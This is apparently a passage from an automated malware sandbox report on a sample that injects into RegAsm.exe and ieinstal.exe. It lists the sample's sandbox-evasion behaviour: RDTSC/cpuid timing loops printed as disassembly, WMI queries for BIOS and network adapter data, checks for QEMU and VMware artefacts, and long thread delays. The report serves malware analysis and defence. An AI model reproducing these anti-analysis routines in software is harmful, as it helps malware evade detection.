Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Windows\Installer\MSI7397.tmp	RDTSC instruction interceptor: First address: 000000000058124D second address: 000000000058124D instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FD8F0B18438h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test ebx, ecx 0x0000001f pop ecx 0x00000020 test ah, dh 0x00000022 add edi, edx 0x00000024 dec ecx 0x00000025 jmp 00007FD8F0B18442h 0x00000027 cmp dl, dl 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007FD8F0B18409h 0x0000002e cmp ecx, ebx 0x00000030 push ecx 0x00000031 call 00007FD8F0B18475h 0x00000036 call 00007FD8F0B18448h 0x0000003b lfence 0x0000003e mov edx, dword ptr [7FFE0014h] 0x00000044 lfence 0x00000047 ret 0x00000048 mov esi, edx 0x0000004a pushad 0x0000004b rdtsc
Source: C:\Windows\Installer\MSI7397.tmp	RDTSC instruction interceptor: First address: 00000000005805B3 second address: 00000000005805B3 instructions:
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 0000000000871545 second address: 0000000000871545 instructions:
Source: C:\Users\user\AppData\Local\Temp\ota.exe	RDTSC instruction interceptor: First address: 0000000002322D2B second address: 0000000002322D2B instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FD8F0B430B8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e jmp 00007FD8F0B430C2h 0x00000020 cmp ax, bx 0x00000023 cmp eax, ebx 0x00000025 add edi, edx 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007FD8F0B43086h 0x0000002d push ecx 0x0000002e cmp ax, 00004A60h 0x00000032 cmp al, cl 0x00000034 call 00007FD8F0B430FAh 0x00000039 call 00007FD8F0B430C8h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ota.exe	RDTSC instruction interceptor: First address: 0000000002322338 second address: 0000000002322338 instructions:
Source: C:\Users\user\AppData\Local\Temp\ota.exe	RDTSC instruction interceptor: First address: 00000000023225E9 second address: 00000000023225E9 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000941765 second address: 0000000000941765 instructions:
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 0000000002112D2B second address: 0000000002112D2B instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FD8F0B430B8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e jmp 00007FD8F0B430C2h 0x00000020 cmp ax, bx 0x00000023 cmp eax, ebx 0x00000025 add edi, edx 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007FD8F0B43086h 0x0000002d push ecx 0x0000002e cmp ax, 00004A60h 0x00000032 cmp al, cl 0x00000034 call 00007FD8F0B430FAh 0x00000039 call 00007FD8F0B430C8h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 0000000002112338 second address: 0000000002112338 instructions:
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000021125E9 second address: 00000000021125E9 instructions:
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000020D2D2B second address: 00000000020D2D2B instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FD8F0B43208h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e jmp 00007FD8F0B43212h 0x00000020 cmp ax, bx 0x00000023 cmp eax, ebx 0x00000025 add edi, edx 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007FD8F0B431D6h 0x0000002d push ecx 0x0000002e cmp ax, 00004A60h 0x00000032 cmp al, cl 0x00000034 call 00007FD8F0B4324Ah 0x00000039 call 00007FD8F0B43218h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000020D2338 second address: 00000000020D2338 instructions:
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000020D25E9 second address: 00000000020D25E9 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000F01765 second address: 0000000000F01765 instructions:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Windows\Installer\MSI7397.tmp	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Installer\MSI7397.tmp	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ota.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Afkodedes8\asparagussens.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ota.exe, 0000000C.00000002.420913777.0000000000681000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE"R
Source: RegAsm.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Installer\MSI7397.tmp	RDTSC instruction interceptor: First address: 000000000058124D second address: 000000000058124D instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FD8F0B18438h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d test ebx, ecx 0x0000001f pop ecx 0x00000020 test ah, dh 0x00000022 add edi, edx 0x00000024 dec ecx 0x00000025 jmp 00007FD8F0B18442h 0x00000027 cmp dl, dl 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007FD8F0B18409h 0x0000002e cmp ecx, ebx 0x00000030 push ecx 0x00000031 call 00007FD8F0B18475h 0x00000036 call 00007FD8F0B18448h 0x0000003b lfence 0x0000003e mov edx, dword ptr [7FFE0014h] 0x00000044 lfence 0x00000047 ret 0x00000048 mov esi, edx 0x0000004a pushad 0x0000004b rdtsc
Source: C:\Windows\Installer\MSI7397.tmp	RDTSC instruction interceptor: First address: 00000000005813D8 second address: 00000000005813D8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FD8F0B470D7h 0x0000001d popad 0x0000001e call 00007FD8F0B430BDh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Installer\MSI7397.tmp	RDTSC instruction interceptor: First address: 00000000005805B3 second address: 00000000005805B3 instructions:
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 00000000008713D8 second address: 00000000008713D8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FD8F0B470D7h 0x0000001d popad 0x0000001e call 00007FD8F0B430BDh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	RDTSC instruction interceptor: First address: 0000000000871545 second address: 0000000000871545 instructions:
Source: C:\Users\user\AppData\Local\Temp\ota.exe	RDTSC instruction interceptor: First address: 0000000002322D2B second address: 0000000002322D2B instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FD8F0B430B8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e jmp 00007FD8F0B430C2h 0x00000020 cmp ax, bx 0x00000023 cmp eax, ebx 0x00000025 add edi, edx 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007FD8F0B43086h 0x0000002d push ecx 0x0000002e cmp ax, 00004A60h 0x00000032 cmp al, cl 0x00000034 call 00007FD8F0B430FAh 0x00000039 call 00007FD8F0B430C8h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\Temp\ota.exe	RDTSC instruction interceptor: First address: 0000000002322F18 second address: 0000000002322F18 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FD8F0B458E3h 0x0000001d popad 0x0000001e call 00007FD8F0B43259h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ota.exe	RDTSC instruction interceptor: First address: 0000000002322338 second address: 0000000002322338 instructions:
Source: C:\Users\user\AppData\Local\Temp\ota.exe	RDTSC instruction interceptor: First address: 00000000023225E9 second address: 00000000023225E9 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000942F18 second address: 0000000000942F18 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FD8F0B45793h 0x0000001d popad 0x0000001e call 00007FD8F0B43109h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000941765 second address: 0000000000941765 instructions:
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 0000000002112D2B second address: 0000000002112D2B instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FD8F0B430B8h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e jmp 00007FD8F0B430C2h 0x00000020 cmp ax, bx 0x00000023 cmp eax, ebx 0x00000025 add edi, edx 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007FD8F0B43086h 0x0000002d push ecx 0x0000002e cmp ax, 00004A60h 0x00000032 cmp al, cl 0x00000034 call 00007FD8F0B430FAh 0x00000039 call 00007FD8F0B430C8h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 0000000002112F18 second address: 0000000002112F18 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FD8F0B458E3h 0x0000001d popad 0x0000001e call 00007FD8F0B43259h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 0000000002112338 second address: 0000000002112338 instructions:
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000021125E9 second address: 00000000021125E9 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000F02F18 second address: 0000000000F02F18 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FD8F0B45793h 0x0000001d popad 0x0000001e call 00007FD8F0B43109h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000020D2D2B second address: 00000000020D2D2B instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FD8F0B43208h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e jmp 00007FD8F0B43212h 0x00000020 cmp ax, bx 0x00000023 cmp eax, ebx 0x00000025 add edi, edx 0x00000027 dec ecx 0x00000028 cmp ecx, 00000000h 0x0000002b jne 00007FD8F0B431D6h 0x0000002d push ecx 0x0000002e cmp ax, 00004A60h 0x00000032 cmp al, cl 0x00000034 call 00007FD8F0B4324Ah 0x00000039 call 00007FD8F0B43218h 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000020D2F18 second address: 00000000020D2F18 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007FD8F0B45793h 0x0000001d popad 0x0000001e call 00007FD8F0B43109h 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000020D2338 second address: 00000000020D2338 instructions:
Source: C:\Users\user\Afkodedes8\asparagussens.exe	RDTSC instruction interceptor: First address: 00000000020D25E9 second address: 00000000020D25E9 instructions:
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000F01765 second address: 0000000000F01765 instructions:

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Code function: 4_2_00871EEC rdtsc

4_2_00871EEC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Window / User API: threadDelayed 9587	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 8730	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1097	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 586	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 9200	Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

API coverage: 9.2 %

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 3396	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 1240	Thread sleep count: 9587 > 30	Jump to behavior
